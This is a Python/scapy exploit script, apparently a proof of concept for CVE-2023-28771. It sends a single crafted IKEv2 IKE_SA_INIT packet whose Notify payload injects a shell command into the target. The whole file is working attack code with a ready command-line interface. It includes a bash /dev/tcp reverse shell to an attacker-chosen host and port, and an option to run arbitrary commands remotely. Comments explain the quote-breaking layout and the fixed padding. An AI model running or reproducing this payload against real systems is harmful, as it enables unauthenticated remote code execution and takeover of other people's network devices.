#!/usr/bin/python3
import sys
from scapy.all import *
import argparse

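# PoC for CVE-2023-28771 (per the file name): sends a single unsolicited IKEv2
# IKE_SA_INIT to UDP/500 whose Notify payload carries a shell fragment.  The
# fragment is shaped to break out of a double-quoted string that the target is
# presumed to wrap the payload in before handing it to a shell; nothing here
# verifies that assumption or checks for a response.  Only use against systems
# you are authorised to test.

# Fixed filler in front of the injected fragment.  Kept byte-for-byte from the
# original PoC; the length presumably matters to where the data lands on the
# target, so do not shorten it without re-testing.
NOTIFY_PADDING = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB"


def _port(value: str) -> int:
    """argparse ``type`` for --lport: an int in 1..65535, anything else is a usage error.

    The original accepted any string and spliced it straight into the
    /dev/tcp/<host>/<port> path, so a typo produced a silently broken payload.
    """
    try:
        port = int(value)
    except ValueError:
        raise argparse.ArgumentTypeError(f"invalid port: {value!r}") from None
    if not 1 <= port <= 65535:
        raise argparse.ArgumentTypeError(f"port out of range: {port}")
    return port


def build_injection(cmd: "str | None", lhost: "str | None", lport: "int | None") -> "str | None":
    """Return the shell fragment placed in the Notify payload, or None if no mode was chosen.

    Layout: ``";bash -c "<inner>";echo -n "`` — the leading ``";`` closes the
    quoted string the target is assumed to build, ``bash -c "<inner>"`` runs our
    command, and the trailing ``;echo -n "`` re-opens a quote so the remainder of
    the target's command line stays syntactically valid.

    ``cmd`` (--cmd) takes precedence over the reverse shell (--lhost/--lport),
    exactly as in the original.  The reverse shell is bash-specific
    (``/dev/tcp`` redirection) and assumes bash exists on the target.

    NOTE(review): ``cmd`` is not escaped — a double quote inside it breaks the
    quoting above.  Wrap such commands yourself (e.g. base64 | sh) if needed.
    """
    if cmd is not None:
        inner = cmd
    elif lhost and lport:
        # Interactive bash with stdio redirected to lhost:lport over /dev/tcp.
        inner = f"exec bash -i &>/dev/tcp/{lhost}/{lport} <&1;"
    else:
        return None
    return f'";bash -c "{inner}";echo -n "'


def build_packet(rhost: str, injection: str):
    """Assemble IP/UDP(500)/IKEv2 IKE_SA_INIT with a Notify(type 14) carrying the injection.

    The SPI and the 68-byte nonce are random filler; the Notify type (14) and
    the payload chain (Notify -> Nonce -> None) are kept from the original.
    Requires scapy's ikev2 contrib to be loaded first (see ``main``).
    """
    return (
        IP(dst=rhost)
        / UDP(dport=500)
        / IKEv2(
            init_SPI=RandString(8),
            next_payload="Notify",
            exch_type="IKE_SA_INIT",
            flags="Initiator",
        )
        / IKEv2_payload_Notify(
            next_payload="Nonce",
            type=14,
            load=NOTIFY_PADDING + injection,
        )
        / IKEv2_payload_Nonce(next_payload="None", load=RandString(68))
    )


def main(argv: "list[str] | None" = None) -> None:
    """Parse the CLI (rhost, --cmd | --lhost/--lport), build the packet and send it once.

    Usage errors now exit non-zero via ``parser.error`` (the original printed a
    message and exited 0, which hides failures from wrappers and scripts).
    """
    parser = argparse.ArgumentParser(
        description="Send one IKEv2 IKE_SA_INIT with a command-injection Notify payload."
    )
    parser.add_argument("rhost", help="target IP address (IKE on UDP/500)")
    parser.add_argument("--cmd", help="command to run on the target; takes precedence over --lhost/--lport")
    parser.add_argument("--lhost", help="listener IP for the bash reverse shell")
    parser.add_argument("--lport", type=_port, help="listener TCP port for the bash reverse shell (1-65535)")
    args = parser.parse_args(argv)

    injection = build_injection(args.cmd, args.lhost, args.lport)
    if injection is None:
        parser.error("Check your syntax, and try again")

    # The IKEv2 layers live in scapy.contrib and are not pulled in by scapy.all.
    load_contrib("ikev2")
    # Layer-3 send: scapy opens a raw socket, so this normally needs root.
    send(build_packet(args.rhost, injection))


if __name__ == "__main__":
    main()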